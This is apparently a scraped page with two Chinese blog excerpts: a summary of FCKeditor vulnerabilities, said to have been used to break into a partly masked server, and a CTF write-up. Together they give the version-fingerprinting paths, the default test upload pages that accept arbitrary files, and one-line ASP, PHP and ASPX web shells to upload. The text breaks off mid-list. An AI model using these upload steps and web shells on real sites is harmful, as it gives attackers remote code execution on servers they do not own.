fckeditor漏洞

Fckeditor漏洞总结及其***某服务器

纵饮孤独 提交于 2019-12-22 09:41:08
1.1Fckeditor漏洞总结及其渗透某服务器 有些漏洞看起来简单,级别比较低,不如SQL注入等漏洞来的直接,但在条件合适的情况下,小漏洞发挥大作用,一直以来都想做一个Fckeditor漏洞总结,免得每次遇到目标都需要重新搜索,浪费时间。 1.1.1FCKeditor编辑器漏洞利用总结 1.判断fckeditor版本 通过/fckeditor/editor/dialog/fck_about.html和/FCKeditor/_whatsnew.html页面文件中的版本号来确定。例如访问 http://***.1**.***.***:8081/fckeditor/_whatsnew.html ,获知其版本号为2.4.3。 图1获取Fckeditor版本 2.常见的测试上传地址   Fckeditor编辑器默认会存在test.html和uploadtest.html文件,直接访问这些文件可以获取当前文件夹文件名称以及上传文件,有的版本可以直接上传任意文件类型,测试上传地址有: (1)FCKeditor/editor/filemanager/browser/default/connectors/test.html (2)FCKeditor/editor/filemanager/upload/test.html (3)FCKeditor/editor/filemanager

CTF学习报告4

核能气质少年 提交于 2019-12-05 12:34:56
CTF编辑器漏洞分析 访问ip地址 接下来查询fckeditor的版本 一般是/fckeditor/_whatsnew.html 所以访问http://219.153.49.228:49105/fckeditor/_whatsnew.html 可以看到fckeditor的版本是2.6.4 然后我们需要知道这个fckeditor的上传地址 一般上传地址有这几种 (1)fckeditor/editor/filemanager/browser/default/connectors/test.html (2)fckeditor/editor/filemanager/upload/test.html (3)fckeditor/editor/filemanager/connectors/test.html (4)fckeditor/editor/filemanager/connectors/uploadtest.html 可以都试一下,然后发现正确的上传地址是(3) 访问界面 然后上传一个后缀为.asp的一句话木马。 常用一句话木马 asp一句话木马:    <%execute(request("value"))%>   php一句话木马:    <?php @eval($_POST[value]);?>   aspx一句话木马:   <%@ Page Language="Jscript"%>